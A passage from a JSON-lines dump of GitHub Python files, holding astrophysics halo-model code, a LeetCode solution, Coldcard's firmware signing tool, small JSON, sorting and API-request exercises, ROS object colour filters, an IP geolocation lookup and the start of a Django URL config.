hmf*biasmz\n denom = self.nbargal()\n integral = num/denom\n # dm = np.log10(m)\n dlog10m = np.log10(m[1] / m[0])\n res = (intg.simps(integral, dx=dlog10m, axis=1, even='avg'))**2\n res *= power\n return res\n\n def cl1h_gal(self):\n z = self.z\n ucen = self.unfw\n unfw = self.unfw\n dchidz = self.uni.dchi_dz(self.z)\n chi = self.uni.chi(self.z)\n\n window = self.window_gal()\n wind_gal = window(z)/dchidz\n geo = dchidz*wind_gal**2/chi**2\n oneh = self.p1h_gal(ucen, unfw)\n # print (\"one halo gal Pk %s\" % (oneh[-1, -10:]))\n integral = geo*oneh\n res = intg.simps(integral, x=z, axis=-1, even='avg')\n # print (\"one halo gal cl %s\" % (res[-10:]))\n return res\n\n def cl2h_gal(self):\n z = self.z\n ucen = self.unfw\n unfw = self.unfw\n power = self.uni.Pk_array(self.ell, self.z)\n dchidz = self.uni.dchi_dz(self.z)\n chi = self.uni.chi(self.z)\n\n window = self.window_gal()\n wind_gal = window(z)/dchidz\n geo = dchidz*wind_gal**2/chi**2\n twoh = self.p2h_gal(ucen, unfw, power)\n integral = geo*twoh\n res = intg.simps(integral, x=z, axis=-1, even='avg')\n return res\n\n def clshot_gal(self):\n if self.gal_exp == 'CMASS':\n # \"\"\"\n # this is CMASS data\n data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n Z = data[:, 0]\n Dndz = data[:, 1]\n ngaltot = intg.simps(Dndz, x=Z, even='avg')\n elif self.gal_exp == 'DESI_ELG' or self.gal_exp == 'DESI_LRG':\n data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n ngaltot = np.sum(ngal)\n else:\n data = np.loadtxt('data_files/dndz_DESI_ELG.txt')\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n ngaltot = np.sum(ngal)\n # ngaltot *= 10\n \"\"\"\n # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n data = np.loadtxt(\"data_files/dndz_DESI_LRG.txt\")\n # add all the ngal contributions coming from different redshifts\n # and then take its inverse to get the shot noise in angular power\n # spectrum i.e. C_l^{SN} = 1./ngal where ngal is the angular number\n # density i.e. number of galaxies per steradian.\n # shot = self.Nbargal()\n # \"\"\"\n shot = 1./ngaltot\n return shot\n\n def cl_galtot(self):\n oneh = self.cl1h_gal()\n twoh = self.cl2h_gal()\n shot = np.repeat(self.clshot_gal(), len(self.ell))\n tot = oneh+twoh+shot\n return tot\n\n def cl1h_vel(self):\n z = self.z\n ucen = self.unfw\n unfw = self.unfw\n dchidz = self.uni.dchi_dz(self.z)\n chi = self.uni.chi(self.z)\n\n window = self.window_gal()\n wind_gal = window(z)/dchidz\n geo = dchidz*wind_gal**2/chi**2\n oneh = self.p1h_gal(ucen, unfw)\n oneh *= self.uni.beta2(self.z)\n # print (\"one halo vell Pk %s\" % (oneh[-1, -10:]))\n integral = geo*oneh\n res = intg.simps(integral, x=z, axis=-1, even='avg')\n # print (\"one halo vel cl %s\" % (res[-10:]))\n return res\n\n def cl2h_vel(self):\n z = self.z\n ucen = self.unfw\n unfw = self.unfw\n power = self.uni.Pk_array(self.ell, self.z)\n dchidz = self.uni.dchi_dz(self.z)\n chi = self.uni.chi(self.z)\n\n window = self.window_gal()\n wind_gal = window(z)/dchidz\n geo = dchidz*wind_gal**2/chi**2\n twoh = self.p2h_gal(ucen, unfw, power)\n twoh *= self.uni.beta2(self.z)\n integral = geo*twoh\n res = intg.simps(integral, x=z, axis=-1, even='avg')\n return res\n\n def clshot_vel(self):\n \"\"\"\n SHOT NOISE FOR VELOCITY POWER SPECTRUM? DO WE WEIGHT BETA2 AT EVERY\n REDSHIFT BIN WITH NUMBER DENSITY OF THE GALAXIES?\n \"\"\"\n \"\"\"\n For now, I am going to weigh the shot noise contribution coming from\n every redshift by . And then get the shot noise in angular\n space.\n \"\"\"\n \n if self.gal_exp == 'CMASS':\n # \"\"\"\n # this is CMASS data\n data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n Z = data[:, 0]\n Dndz = data[:, 1]\n beta2 = self.uni.beta2(Z)\n res = Dndz*beta2\n ngaltot = intg.simps(res, x=Z, even='avg')\n else:\n data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n Z = (data[:, 0]+data[:, 1])/2.\n beta2 = self.uni.beta2(Z)\n res = ngal*beta2\n ngaltot = np.sum(res)\n \"\"\"\n # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n # add all the ngal contributions coming from different redshifts\n # and then take its inverse to get the shot noise in angular power\n # spectrum i.e. C_l^{SN} = 1./ngal where ngal is the angular number\n # density i.e. number of galaxies per steradian.\n # shot = self.Nbargal()\n # \"\"\"\n shot = 1./ngaltot\n # print (shot)\n return shot\n\n def cl_veltot(self):\n oneh = self.cl1h_vel()\n twoh = self.cl2h_vel()\n # shot = np.repeat(self.clshot_vel(), len(self.ell))\n tot = oneh+twoh # +shot\n return tot\n","repo_name":"abhimaniyar/DopplerCIB","sub_path":"Gal_halo.py","file_name":"Gal_halo.py","file_ext":"py","file_size_in_byte":13751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35323868764","text":"class Solution:\n def findAllRecipes(self, recipes: List[str], ingredients: List[List[str]], supplies: List[str]) -> List[str]:\n N=len(recipes)\n supplies=set(supplies)\n indegree=defaultdict(int)\n orderdrecipe=[]\n adjlist=defaultdict(list)\n queue=deque()\n\n\n for i in range(N):\n for j in range(len(ingredients[i])):\n if ingredients[i][j] not in supplies:\n adjlist[ingredients[i][j]].append(recipes[i])\n indegree[recipes[i]]+=1\n \n\n for i in range(N):\n if indegree[recipes[i]]==0:\n queue.append(recipes[i])\n\n # print(queue)\n while queue:\n # for _ in range(len(queue)):\n recipe=queue.popleft()\n orderdrecipe.append(recipe)\n\n for x in adjlist[recipe]:\n indegree[x]-=1\n if indegree[x]==0:\n queue.append(x)\n return orderdrecipe","repo_name":"yoseflakew25/A2SV","sub_path":"find-all-possible-recipes-from-given-supplies.py","file_name":"find-all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71833986147","text":"import os, sys, struct, pdb, click\nfrom collections import namedtuple\nfrom binascii import b2a_hex\nfrom hashlib import sha256\nfrom ecdsa import SigningKey, VerifyingKey\nfrom ecdsa.curves import SECP256k1\nfrom sigheader import *\n\n# more details about header\nheader = namedtuple('header', FWH_PY_VALUES)\npacked_len = struct.calcsize(FWH_PY_FORMAT)\nassert packed_len == FW_HEADER_SIZE, \\\n \"FWH_PY_FORMAT is wrong: gives %d length, not %d\" % (packed_len, FW_HEADER_SIZE)\n\ndef pad_to(orig, size, fill=b'\\xff'):\n assert len(orig) <= size, \"too big; no room for padding: %d > %d\" % (len(orig), size)\n\n return orig.ljust(size, fill)\n\ndef align_to(n, alignment):\n # align to # of bytes (a power of two)\n return (n + alignment - 1) & ~(alignment-1)\n \ndef timestamp(backdate=0):\n # render 16-byte BCD timecode in something like ISO 8601\n import datetime\n n = datetime.datetime.utcnow()\n if backdate:\n n -= datetime.timedelta(days=backdate)\n\n f = n.strftime('%y%0m%0e%0H%0M%0S0000').encode('ascii')\n assert len(f) == 16\n \n # hex string to binary, but BCD..isn't that just a2b_hex?\n rv = bytes([ ((f[i]& 0xf) << 4) | (f[i+1] & 0xf) for i in range(0, 16, 2)])\n\n assert len(rv) == 8, len(rv)\n\n return rv\n\n# Options we want for all commands\n@click.group()\ndef main():\n pass\n\n@main.command()\n@click.option('-n', type=int, help='Which key # to make', default=1)\n@click.option('--path-pattern', '-p',\n default='keys/%02d.pem', type=str, help='Where to put results')\ndef make_keys(n, path_pattern):\n \"Constuct new keys (only can be used once)\"\n # run once only\n\n from ecdsa.util import randrange_from_seed__trytryagain\n\n def make_key_from_seed(seed, curve=SECP256k1):\n secexp = randrange_from_seed__trytryagain(seed, curve.order)\n return SigningKey.from_secret_exponent(secexp, curve)\n\n assert 1 <= n < 16\n\n if 0:\n # deterministic\n seed = 'ehllo'\n sk1 = make_key_from_seed(\"%02d:%s\" % (n, seed))\n else:\n # actually used:\n sk1 = make_key_from_seed(os.urandom(128))\n\n fn = path_pattern % n\n assert not os.path.exists(fn), \"Already exists: \" + fn\n\n pubkey = sk1.get_verifying_key()\n\n open(fn, 'wb').write(sk1.to_pem())\n fn = fn.replace('.pem', '.pubkey')\n open(fn+'.pem', 'wb').write(pubkey.to_pem())\n #open(fn+'.bin', 'wb').write(pubkey.to_string())\n open(fn+'.c', 'wt').write(', '.join('0x%02x'%i for i in pubkey.to_string()))\n\n\n@main.command('version')\n@click.argument('fname')\ndef show_version(fname):\n # just dump the version number in a form that makes for good filenames\n data = open(fname, 'rb').read()\n\n if data[0:5] == b'DfuSe':\n # Got DFU file, pulling out raw binary.\n (_, _, data),*_ = dfu_parse(open(fname, 'rb'))\n\n hdr = data[FW_HEADER_OFFSET:FW_HEADER_OFFSET+FW_HEADER_SIZE ]\n\n hdr = header(**dict(zip(FWH_PY_VALUES.split(), struct.unpack(FWH_PY_FORMAT, hdr))))\n\n ver = str(hdr.version_string.split(b'\\0', 1)[0], 'ascii')\n ts = str(b2a_hex(hdr.timestamp), 'ascii')\n built = '20' + '-'.join(ts[i:i+2] for i in range(0, 6, 2))\n built += 'T' + ''.join(ts[i:i+2] for i in range(6, 10, 2))\n\n print('{built}-v{ver}'.format(built=built, ver=ver))\n\ndef dfu_parse(fd):\n # do just a little parsing of DFU headers, to find start/length of main binary\n # - not trying to support anything but what ../stm32/Makefile will generate\n # - see external/micropython/tools/pydfu.py for details\n # - works sequentially only\n import struct\n from collections import namedtuple\n\n fd.seek(0)\n\n def consume(xfd, tname, fmt, names):\n # Parses the struct defined by `fmt` from `data`, stores the parsed fields\n # into a named tuple using `names`. Returns the named tuple.\n size = struct.calcsize(fmt)\n here = xfd.read(size)\n ty = namedtuple(tname, names.split())\n values = struct.unpack(fmt, here)\n return ty(*values)\n\n dfu_prefix = consume(fd, 'DFU', '<5sBIB', 'signature version size targets')\n\n #print('dfu: ' + repr(dfu_prefix))\n\n assert dfu_prefix.signature == b'DfuSe', \"Not a DFU file (bad magic)\"\n\n for idx in range(dfu_prefix.targets):\n\n prefix = consume(fd, 'Target', '<6sBI255s2I', \n 'signature altsetting named name size elements')\n\n #print(\"target%d: %r\" % (idx, prefix))\n\n for ei in range(prefix.elements):\n # Decode target prefix\n # < little endian\n # I uint32_t element address\n # I uint32_t element size\n elem = consume(fd, 'Element', '<2I', 'addr size')\n\n #print(\"target%d: %r\" % (ei, elem))\n\n yield fd.tell(), elem.size, fd.read(elem.size)\n\n\n@main.command('split')\n@click.argument('dfu', metavar='202....-coldcard.dfu')\n@click.argument('firmware', metavar='FIRMWARE.bin')\n@click.argument('bootrom', metavar='BOOTROM.bin')\ndef split_dfu(dfu, firmware, bootrom):\n \"Pull out sections from DFU file for verification purposes\"\n\n with open(dfu, 'rb') as fd:\n for n, (off, ln, data) in enumerate(dfu_parse(fd)):\n if n == 0:\n target = firmware\n name = 'Firmware'\n elif n == 1:\n target = bootrom\n name = 'Bootrom'\n else:\n raise ValueError(n)\n\n # keep this printout so others can check our copy is faithful\n print(f'start {off} for {ln} bytes: {name} => {target}')\n\n open(target, 'wb').write(data)\n\n@main.command('check')\n@click.argument('fname', default='firmware-signed.bin')\ndef readback(fname):\n \"Verify pubkey and signature used in binary file\"\n data = open(fname, 'rb').read()\n\n if data[0:5] == b'DfuSe':\n click.secho(\"Got DFU file, pulling out raw binary.\", fg='red')\n (_, _, data),*_ = dfu_parse(open(fname, 'rb'))\n\n hdr = data[FW_HEADER_OFFSET:FW_HEADER_OFFSET+FW_HEADER_SIZE ]\n\n vals = {}\n for fld, v in zip(FWH_PY_VALUES.split(), struct.unpack(FWH_PY_FORMAT, hdr)):\n vals[fld] = v\n\n if fld == 'version_string':\n v = str(v.split(b'\\0', 1)[0], 'ascii')\n elif fld in ('magic_value'):\n v = hex(v)\n elif fld in ('signature', 'future'):\n v = str(b2a_hex(v), 'ascii')\n v = v[0:16] + ' ... ' + v[-16:]\n elif fld == 'install_flags':\n nv = '0x%x =>' % v\n if v & FWHIF_HIGH_WATER:\n nv += ' HIGH_WATER'\n v = nv\n elif fld == 'hw_compat':\n nv = '0x%x => ' % v\n d = []\n if v & MK_1_OK: d.append('Mk1')\n if v & MK_2_OK: d.append('Mk2')\n if v & MK_3_OK: d.append('Mk3')\n if v & MK_4_OK: d.append('Mk4')\n if v & ~(MK_1_OK | MK_2_OK | MK_3_OK | MK_4_OK):\n d.append('?other?')\n v = nv + '+'.join(d)\n elif fld == 'timestamp':\n v = str(b2a_hex(v), 'ascii')\n nv = '20' + '-'.join(v[i:i+2] for i in range(0, 6, 2)) + ' '\n nv += ':'.join(v[i:i+2] for i in range(6, 6+6, 2))\n v = nv + ' UTC'\n\n print(\"%16s: %s\" % (fld, v))\n\n # non-useful value, fixed.\n #print('runtime hdr at: 0x%08x' % (0x08008000 + FW_HEADER_OFFSET))\n\n a = sha256(data[0:FW_HEADER_OFFSET+FW_HEADER_SIZE-64])\n a.update(data[FW_HEADER_OFFSET+FW_HEADER_SIZE:])\n chk = sha256(a.digest()).digest()\n\n print(\"sha256^2: %s\" % b2a_hex(chk).decode('ascii'))\n\n # from pubkey\n vk = VerifyingKey.from_pem(open(\"keys/%02d.pubkey.pem\" % vals['pubkey_num']).read())\n\n try:\n ok = vk.verify_digest(vals['signature'], chk)\n except:\n ok = False\n\n print('%16s: %s' % (\"ECDSA Signature\", ('CORRECT' if ok else 'Wrong, wrong, wrong!!!')))\n\n\n@main.command('sign')\n@click.argument('version', required=True)\n@click.option('--pubkey-num', '-k', type=int, help='Which key # to use for signing', default=0)\n@click.option('--high_water', '-h', is_flag=True, help='Mark version as new highwater mark (no downgrades below this version)')\n@click.option('--verbose', '-v', default=False, is_flag=True, help='Show numbers related to signature')\n@click.option('--hw-compat', '-m', type=int, metavar='BITMASK', help=\"Set HW compat field (mk number)\")\n@click.option('--backdate', type=int, metavar='DAYS',\n help='Make downgrade attack test version', default=0)\n@click.option('--build_dir', '-b', default='l-port/build-COLDCARD')\n@click.option('--resign_file', '-r', type=click.File('rb'),\n help='Replace existing signature', default=None)\n@click.option('--outfn', '-o', type=click.Path(),\n help='Output filename', default='firmware-signed.bin')\n@click.option('--keydir', type=str, metavar='DIRPATH', help=\"Where to find priv keys for signing\", default='keys')\ndef doit(keydir, outfn=None, build_dir=None, high_water=False,\n current=False, hw_compat=None,\n version='0.1a', pubkey_num=0, backdate=0, verbose=False, resign_file=None):\n \"Add signature into binary file before it becomes a DFU file.\"\n\n assert len(version) < 8, \"Version string limited to 8 bytes, got: %r\" % version\n\n # load key\n try:\n sk = SigningKey.from_pem(open(f\"{keydir}/{pubkey_num:02d}.pem\").read())\n except FileNotFoundError:\n click.secho(f\"You don't have that key ({pubkey_num}), so using key zero instead!\", fg='red')\n pubkey_num = 0\n sk = SigningKey.from_pem(open(f\"{keydir}/{pubkey_num:02d}.pem\").read())\n \n if resign_file:\n whole = resign_file.read()\n vectors = whole[0:FW_HEADER_OFFSET]\n body = whole[FW_HEADER_OFFSET+FW_HEADER_SIZE:]\n #click.echo('%s: %d + (128) + %d size' % (resign_file.name, len(vectors), len(body)))\n else:\n vectors = open(build_dir + '/firmware0.bin', 'rb').read()\n body = open(build_dir + '/firmware1.bin', 'rb').read()\n\n if hw_compat == 4:\n hw_compat = MK_4_OK\n elif hw_compat in {3, None}:\n hw_compat = MK_2_OK | MK_3_OK\n else:\n assert not \"known\"\n\n assert len(vectors) <= FW_HEADER_OFFSET, \"isr vectors area is too big!\"\n assert len(body) >= FW_MIN_LENGTH, \"main firmware is too small: %d\" % len(body)\n\n body_len = align_to(len(body), 512)\n\n if hw_compat & (MK_1_OK | MK_2_OK | MK_3_OK):\n # bugfix: size must be non-page aligned, so extra bytes are erased past end\n if (body_len % 4096) == 0:\n body_len += 512\n assert body_len % 512 == 0, body_len\n else:\n # bugfix: PSRAM-based products (Mk4, Q1) need to erase 4k blocks, so\n # trouble happens if final binary isn't aligned to that size.\n body_len = align_to(body_len, 4096)\n assert body_len % 4096 == 0, body_len\n\n # pad out \n vectors = pad_to(vectors, FW_HEADER_OFFSET)\n body = pad_to(body, body_len)\n version = pad_to(version.encode('ascii'), 8, b'\\0')\n\n hdr = header( magic_value=FW_HEADER_MAGIC,\n version_string=version,\n firmware_length=FW_HEADER_OFFSET+FW_HEADER_SIZE+body_len,\n install_flags=(FWHIF_HIGH_WATER if high_water else 0x0),\n hw_compat=hw_compat,\n best_ts=bytes(8),\n future=b'\\0'*(4*FWH_NUM_FUTURE),\n signature=b'\\xff'*64,\n pubkey_num=pubkey_num,\n timestamp=timestamp(backdate) )\n\n assert FW_MIN_LENGTH <= hdr.firmware_length <= FW_MAX_LENGTH, hdr.firmware_length\n\n if hw_compat & MK_4_OK:\n # new value for Mk4: limited only by final binary size, not SPI flash\n USB_MAX_LEN = 1472 * 1024\n else:\n # actual file length limited by size of SPI flash area reserved to txn data/uploads\n USB_MAX_LEN = (786432-128)\n\n assert hdr.firmware_length <= USB_MAX_LEN, \\\n \"too big for our USB upgrades: %d = %d bytes too big\" % (\n hdr.firmware_length, hdr.firmware_length-USB_MAX_LEN)\n\n print(\"Remaining flash space: %d bytes\" % (USB_MAX_LEN - hdr.firmware_length))\n\n binhdr = struct.pack(FWH_PY_FORMAT, *hdr)\n assert len(binhdr) == FW_HEADER_SIZE\n assert len(vectors + binhdr[:-64]) == 0x3fc0\n\n hashable = vectors + binhdr[:-64] + body\n fw_hash = sha256(sha256(hashable).digest()).digest()\n\n assert len(fw_hash) == 32\n\n if verbose:\n print(\"Hdr: %s\" % repr(hdr))\n print('Hash: %s' % b2a_hex(fw_hash).decode('ascii'))\n\n from ecdsa.util import sigencode_string\n sig = sk.sign_digest(fw_hash, sigencode=sigencode_string)\n\n assert len(sig) == 64\n final = binhdr[:-64] + sig\n assert len(final) == FW_HEADER_SIZE\n\n if verbose:\n print('Signature: %s' % b2a_hex(sig).decode('ascii'))\n\n open(outfn, 'wb').write(vectors + final + body)\n\n if verbose:\n print(\"Wrote: %s\" % outfn)\n print(\"Signed by pubkey=%d install_flags=0x%x\" % (hdr.pubkey_num, hdr.install_flags))\n \n# EOF\n","repo_name":"Coldcard/firmware","sub_path":"cli/signit.py","file_name":"signit.py","file_ext":"py","file_size_in_byte":13048,"program_lang":"python","lang":"en","doc_type":"code","stars":467,"dataset":"github-code","pt":"70"}
+{"seq_id":"75106952227","text":"import json\n\n\nwith open (\"states.json\") as stat:\n data = json.load(stat)\n\n for i in data[\"states\"]:\n print(i)\n\ndict1 ={\n\n \"name\": \"Lisa\",\n \"designation\": \"programmer\",\n \"age\": \"34\",\n \"salary\": \"54000\"\n\n\n}\n\nwith open(\"myjs.json\",\"w\") as out:\n json.dump(dict1, out, indent=\"\")\n\njdict = json.dumps(dict1, indent=\"\")\n\nprint(jdict)\n\nsortdict= sorted(dict1)\n\njdict2 = json.dumps(sortdict, indent=4)\n\nprint(jdict2)\n\nwith open (\"states.json\") as stat:\n data = json.load(stat)\n newStates=[]\n for i in data[\"states\"]:\n state={\"name\": i[\"name\"], \"abbreviation\" : i[\"abbreviation\"]}\n newStates.append(state)\n statesDict={\"States\" : newStates}\n print(statesDict)\n with open(\"states_no_area.json\", \"w\") as out:\n json.dump(statesDict,out, indent= 2)\n\n\n","repo_name":"emabongio/OAVN","sub_path":"EsVari/esb_part2.py","file_name":"esb_part2.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19573684660","text":"#!/usr/bin/env python\n\nfrom hlpr_perception_msgs.msg import ExtractedFeaturesArray\nfrom colorsys import rgb_to_hsv, hsv_to_rgb\nfrom yaml_include_loader.loader import *\nimport hsv_utils\nimport rospy\nimport yaml\n\ndef hue_filter(h_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n h = obj.basicInfo.hue\n if hsv_utils.in_hue_range(h, h_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f \n\ndef hsv_filter(h_range, s_range, v_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n r = obj.basicInfo.rgba_color.r\n g = obj.basicInfo.rgba_color.g\n b = obj.basicInfo.rgba_color.b\n h, s, v = rgb_to_hsv(r, g, b)\n if hsv_utils.in_hsv_range(h, s, v, h_range, s_range, v_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f\n\ndef rgb_filter(r_range, g_range, b_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n r = obj.basicInfo.rgba_color.r\n g = obj.basicInfo.rgba_color.g\n b = obj.basicInfo.rgba_color.b\n if hsv_utils.in_rgb_range(r, g, b, r_range, g_range, b_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f\n\ndef largest_filter(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n largest_idx = None\n largest_vol = -float('inf')\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n vol = obj.obb.bb_dims.x*obj.obb.bb_dims.y*obj.obb.bb_dims.z\n if vol > largest_vol:\n largest_idx = idx\n largest_vol = vol\n\n if largest_idx is None:\n return []\n else:\n return [largest_idx] \n\n# ordered is only accepted kwarg\ndef compose_filters(*filters, **kwargs):\n ordered = kwargs.pop('ordered', True)\n\n def f(msg, idxs=None):\n if ordered:\n keep_idxs = filters[0](msg, idxs)\n for filt in filters[1:]:\n keep_idxs = filt(msg, keep_idxs)\n else:\n keep_idxs = list(reduce(lambda x, y: x.intersection(y), \n [set(filt(msg, idxs)) for filt in filters], \n []))\n return keep_idxs\n\n return f\n\ndef object_filter(params):\n h_range = (params['hue']['min'], params['hue']['max'])\n s_range = (params['saturation']['min'], params['saturation']['max'])\n v_range = (params['value']['min'], params['value']['max'])\n\n def f(msg):\n return compose_filters(hsv_filter(h_range, s_range, v_range), largest_filter)(msg)\n \n return f\n\ndef object_filter_from_yaml(yaml_file):\n with open(yaml_file, 'r') as f:\n params = yaml.load(f, Loader=YAMLIncludelLoader)\n return object_filter(params)\n\ndef object_filters_from_yaml(yaml_file):\n with open(yaml_file, 'r') as f:\n objects = yaml.load(f, Loader=YAMLIncludeLoader)['objects']\n return {obj.keys()[0]: object_filter(obj[obj.keys()[0]]) for obj in objects} \n\ndef load_tasks(yaml_file):\n with open(yaml_file, 'r') as f:\n tasks = yaml.load(f, Loader=YAMLIncludeLoader)['tasks']\n\n return {task.keys()[0]: {obj.keys()[0]: object_filter(obj[obj.keys()[0]]) for obj in task[task.keys()[0]]['objects']} for task in tasks}\n\n","repo_name":"ragtz/feature_extraction_scripts","sub_path":"object_filters.py","file_name":"object_filters.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16620839453","text":"import requests\n\ndef retornaCep(cep):\n response = requests.get(\"https://viacep.com.br/ws/{}/json/\".format(cep)) #Puxa as informações do site(requisição de api)\n \n print(response.status_code) #Retorna 200 quando da certo\n print(response.json()) #Printa as informações como um arquivo json(dicionario/dict)\n\n dadosCep = response.json()\n print (dadosCep[\"logradouro\"])\n print (dadosCep[\"bairro\"])\n return dadosCep\n\ndef retornaSite(url):\n response = requests.get(url)\n return response.text\n\ndef retornaPokemon(pokemon):\n response = requests.get(\"https://pokeapi.co/api/v2/pokemon/{}\".format(pokemon))\n dadosPokemon = response.json()\n return dadosPokemon\n\nif __name__ == '__main__':\n response = retornaSite(\"https://globallab.org/en/#.YQ7Rk1PPyUk\")\n print (response)\n #retornaCep(\"83215290\")\n # dadosPokemon = retornaPokemon(\"pikachu\")\n # print (dadosPokemon[\"sprites\"][\"front_shiny\"])","repo_name":"Vinezius/Python-Aulas-Iniciais","sub_path":"Aula03/Importacao.py","file_name":"Importacao.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29094996150","text":"#\n# @lc app=leetcode id=17 lang=python3\n#\n# [17] Letter Combinations of a Phone Number\n#\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n digits_letter = {\n '2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']\n }\n\n result = []\n\n def backtracking(index, cur_word):\n if len(cur_word) == len(digits):\n result.append(cur_word)\n return\n\n letters = digits_letter[digits[index]]\n for a in letters:\n backtracking(index+1, cur_word+a)\n\n if digits == \"\":\n return result\n backtracking(0, '')\n return result\n","repo_name":"M-Riku/.leetcode","sub_path":"17.letter-combinations-of-a-phone-number.py","file_name":"17.letter-combinations-of-a-phone-number.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23164460753","text":"# Author: YOUR NAME HERE\n# Date: DATE SUBMITTED\n\n# Use word_tokenize to split raw text into words\nfrom string import punctuation\n\nimport nltk\nfrom nltk.tokenize import word_tokenize\n\n\nclass LimerickDetector:\n\n def __init__(self):\n \"\"\"\n Initializes the object to have a pronunciation dictionary available\n \"\"\"\n self._pronunciations = nltk.corpus.cmudict.dict()\n\n def num_syllables(self, word):\n \"\"\"\n Returns the number of syllables in a word. If there's more than one\n pronunciation, take the shorter one. If there is no entry in the\n dictionary, return 1.\n \"\"\"\n\n return 1\n\n def rhymes(self, a, b):\n \"\"\"\n Returns True if two words (represented as lower-case strings) rhyme,\n False otherwise.\n \"\"\"\n\n return False\n\n def is_limerick(self, text):\n \"\"\"\n Takes text where lines are separated by newline characters. Returns\n True if the text is a limerick, False otherwise.\n\n A limerick is defined as a poem with the form AABBA, where the A lines\n rhyme with each other, the B lines rhyme with each other (and not the A\n lines).\n\n (English professors may disagree with this definition, but that's what\n we're using here.)\n \"\"\"\n\n return False\n\nif __name__ == \"__main__\":\n buffer = \"\"\n inline = \" \"\n while inline != \"\":\n buffer += \"%s\\n\" % inline\n inline = input()\n\n ld = LimerickDetector()\n print(\"%s\\n-----------\\n%s\" % (buffer.strip(), ld.is_limerick(buffer)))\n","repo_name":"Pinafore/cl1-hw","sub_path":"limerick/limerick.py","file_name":"limerick.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"70"}
+{"seq_id":"39773230907","text":"import mysql.connector, ipaddress, os, whois\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"ip2location\"\n\n)\nmycursor = mydb.cursor()\ndef abc(domain):\n ip_address = int(ipaddress.ip_address(domain))\n ip = \"select country_name,region_name,city_name from ip2location_db5 where ip_from = {} or ip_to = {}\"\n mycursor.execute(ip.format(ip_address, ip_address))\n myresult = mycursor.fetchall()\n if myresult == []:\n return \"Not Found\"\n else:\n for i in myresult:\n b = []\n for item in i:\n b.append((item.decode('utf-8')))\n c = ', '.join(b)\n return c\n","repo_name":"Hexogenua/project_1","sub_path":"mlq.py","file_name":"mlq.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11326755365","text":"# -*- coding: utf-8 -*-\r\n\r\ndef insert_sort(list):\r\n for i in range(1, len(list)):\r\n temp = list[i]\r\n j = i - 1\r\n if list[i] < list[j]:\r\n list[i], list[j] = list[j], list[i]\r\n j = j - 1\r\n while j >= 0 and list[j] > temp:\r\n list[j+1] = list[j]\r\n j = j - 1\r\n list[j+1] = temp\r\n\r\nif __name__ == \"__main__\":\r\n list = [7, 11, 8, 12, 18, 2, 5, 9, 20, 6, 32, 13]\r\n print(list)\r\n insert_sort(list)\r\n print(list)\r\n","repo_name":"cassieeric/Python-Exercises_Interview_questions","sub_path":"简单算法题/排序算法/插入排序/插入排序方法2.py","file_name":"插入排序方法2.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"70"}
+{"seq_id":"39052136058","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nimport wallet.views\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Banka API\",\n default_version='v1',\n description=\"A simple banking app for non-financial people. (Django)\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('notifications/', wallet.views.ListUserNotificationAPIView.as_view()),\n path('notification-update/', 